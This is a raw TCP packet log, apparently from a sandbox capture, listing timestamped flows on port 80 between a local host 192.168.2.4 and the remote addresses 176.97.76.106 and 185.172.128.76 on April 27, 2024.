Apr 27, 2024 01:31:16.443347931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.443468094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443581104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443645954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443676949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.443790913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443829060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443837881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.443898916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.443943024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.444025993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.444185972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.444231987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.444279909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.444351912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.444389105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.444447041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.444483995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.444545031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.462311983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.462368011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.462405920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.462431908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.462461948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.462461948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.462503910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.462559938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.462582111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.462630987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.637113094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637160063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637200117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637238979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637274027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637275934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637315989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637345076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637352943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637387037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637392998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637432098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637469053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637501001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637506962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637526035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637548923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637605906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637644053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637672901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637684107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637701035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637722015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637799978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637870073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637911081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637948990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.637981892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.637986898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638026953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638062000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638065100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638103962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638140917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638170004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638180971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638191938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638220072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638257027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638293028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638318062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638338089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638398886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638437986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638477087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638487101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638514996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638550997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638569117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638591051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638632059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638662100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638670921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638710022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638747931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638756037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638787031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638830900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.638849020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.638917923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.687830925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.687913895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:16.831717014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.831768036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.831809998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.831842899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.831851006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.831890106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.831928015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.831964970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.831981897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.831984043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832024097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832068920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832128048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832165956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832206011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832212925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832261086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832299948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832313061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832339048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832393885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832400084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832433939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832472086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832479954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832509995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832555056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832695007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832734108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832773924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832793951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832813025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832851887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832865953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832890987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832933903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.832937956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.832972050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833010912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833018064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833050013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833086967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833096981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833127022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833164930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833173037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833204985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833241940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833247900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833281040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833321095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833336115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833359957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833396912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833410978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833437920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833476067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833487988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833514929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833551884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833556890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833589077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833626986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833632946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833666086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833703995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833710909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833744049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833781958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833787918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833822012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833870888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.833894968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833934069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833971977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.833982944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834012985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834050894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834064960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834095955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834135056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834146976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834175110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834213972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834218025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834253073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834291935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834296942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834331989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834368944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834372044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834408045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834444046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834466934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834482908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834522009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834530115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834561110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834599972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834610939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834638119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834676027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834683895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834716082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834754944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834762096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834794044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834831953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834832907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834880114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834918976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834928989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.834959030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.834996939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.835005999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.835036993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.835074902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.835083008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.835114002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:16.835153103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.856458902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:16.858411074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.858460903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.858499050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.858534098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.858566999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.858603001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.997889042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:16.997992039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.027544022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027704000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027744055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027759075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.027785063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027823925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027832985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.027861118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027900934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027913094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.027940989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.027997017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.028069019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028142929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028182983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028212070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.028222084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028260946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028300047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028322935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.028337955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028376102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028382063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.028414011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028451920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028461933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.028507948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.028523922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028563023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.028687954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.029088020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.029126883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.029165030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.029206038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.029206038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.029254913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030234098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030272007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030311108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030334949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030349016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030388117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030425072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030446053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030484915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030491114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030523062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030561924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030601978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030636072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030641079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030661106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030678988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030716896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030729055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030755043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030793905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030831099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030844927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030870914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030879974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.030910969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030949116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.030973911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031021118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031059980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031097889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031117916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031136990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031140089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031197071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031205893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031245947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031259060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031286001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031296015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031326056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031337976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031364918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031377077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031403065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031411886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031441927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031450033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031481981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031487942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031522036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031532049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031560898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031567097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031605005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031609058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031644106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031682968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031694889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031721115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031763077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031774044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031801939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031819105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031841993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031873941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031881094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031908989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031917095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031923056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031955957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.031989098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.031996012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032035112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032043934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032073021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032114029 CEST	49734	80	192.168.2.4	176.97.76.106
